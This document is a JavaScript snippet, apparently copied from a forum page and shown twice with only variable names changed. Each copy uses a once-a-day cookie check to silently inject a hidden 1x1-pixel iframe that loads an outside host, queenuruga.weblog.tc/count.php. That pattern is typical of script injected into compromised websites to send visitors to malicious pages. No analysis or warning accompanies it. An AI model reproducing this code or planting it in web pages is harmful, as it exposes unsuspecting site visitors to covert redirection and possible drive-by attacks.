| 复制代码function zzzfff(){
  var shlrl = document.createElement('iframe');
  shlrl.src = 'http://queenuruga.weblog.tc/count.php';
  shlrl.style.position = 'absolute';
  shlrl.style.border = '0';
  shlrl.style.height = '1px';
  shlrl.style.width = '1px';
  shlrl.style.left = '1px';
  shlrl.style.top = '1px';
  if (!document.getElementById('shlrl')){
    document.write('<div id=\'shlrl\'></div>');
    document.getElementById('shlrl').appendChild(shlrl);
  }
}
function SetCookie(cookieName, cookieValue, nDays, path){
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0)nDays = 1;
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name){
  var start = document.cookie.indexOf(name + "=");
  var len = start + name.length + 1;
  if ((!start) && (name != document.cookie.substring(0, name.length))){
    return null;
  }
  if (start ==  - 1)return null;
  var end = document.cookie.indexOf(";", len);
  if (end ==  - 1)end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){
  }
  else {
    SetCookie('visited_uq', '55', '1', '/');
    zzzfff();
  }
}
复制代码function zzzfff(){
  var gw = document.createElement('iframe');
  gw.src = 'http://queenuruga.weblog.tc/count.php';
  gw.style.position = 'absolute';
  gw.style.border = '0';
  gw.style.height = '1px';
  gw.style.width = '1px';
  gw.style.left = '1px';
  gw.style.top = '1px';
  if (!document.getElementById('gw')){
    document.write('<div id=\'gw\'></div>');
    document.getElementById('gw').appendChild(gw);
  }
}
function SetCookie(cookieName, cookieValue, nDays, path){
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0)nDays = 1;
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name){
  var start = document.cookie.indexOf(name + "=");
  var len = start + name.length + 1;
  if ((!start) && (name != document.cookie.substring(0, name.length))){
    return null;
  }
  if (start ==  - 1)return null;
  var end = document.cookie.indexOf(";", len);
  if (end ==  - 1)end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){
  }
  else {
    SetCookie('visited_uq', '55', '1', '/');
    zzzfff();
  }
}
 |